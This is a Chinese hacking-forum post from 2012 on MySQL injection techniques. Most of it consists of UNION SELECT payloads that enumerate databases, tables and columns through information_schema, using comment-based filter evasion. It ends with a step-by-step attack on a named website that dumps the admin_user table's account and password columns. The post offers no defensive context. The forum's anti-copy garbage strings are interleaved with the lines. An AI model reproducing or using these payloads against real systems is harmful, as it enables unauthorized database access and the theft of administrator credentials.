找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1932|回复: 0
打印 上一主题 下一主题

mysql注入技巧

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:29:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
查库
0 R! t9 n4 T+ _7 i
- e/ M: _+ }* L5 L7 M/ U" r* S+ Vid=-1 union select 1,..,SCHEMA_NAME,n  from/**/information_schema.SCHEMATA limit 1,1/*
% V8 g9 U+ T0 Q- x5 o
1 Q" E0 W' b% c) l5 M4 S- Z7 e查表
9 c' e+ ^6 d& k" r
- N7 {# g7 O% k6 Kid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,10 Q) x5 {" V  f, j& K3 s
; _. S3 W( B( N7 \, k
查段
# |- s  u% E6 C8 I* O4 [3 S+ W! ~  P8 N$ N2 o
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
8 ?5 q. Q) `3 b& Q) x9 I' b* w/ g* I# B

6 O0 _3 A3 X- H9 Emysql5高级注入方法暴表8 O% T+ }' t4 x' X8 C, B6 \

" Y) ]; E( }) a$ g, P例子如下:
- Y! r* e) p: b$ h8 Q% @" H' s0 L, ~, i- I9 J. b3 A8 a
1.爆表  S$ q* `) q% r: _2 @& \, Y: g
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*    (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet); G5 d  a4 Q! |! d; ]/ z: Z
这样爆到第4个时出现了admin_user表。
7 T$ a/ X; a5 }/ Q+ I4 H5 o) o+ Z! c
2.暴字段
7 x' T* V( k: G) V. o' p1 j* rhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*9 i" p/ y/ d2 `# O$ r% n

& A/ p1 @; [! L& w& u) f
3 q% @2 }1 j4 v$ p! F* W3.爆密码
, [$ M7 ~( E/ ohttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* # d$ _9 ~8 {* I( ?* U7 y$ R

4 j; ?/ K' ^7 K; V4 ?
* c9 G0 N- D3 N8 G2 q; F' l. d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表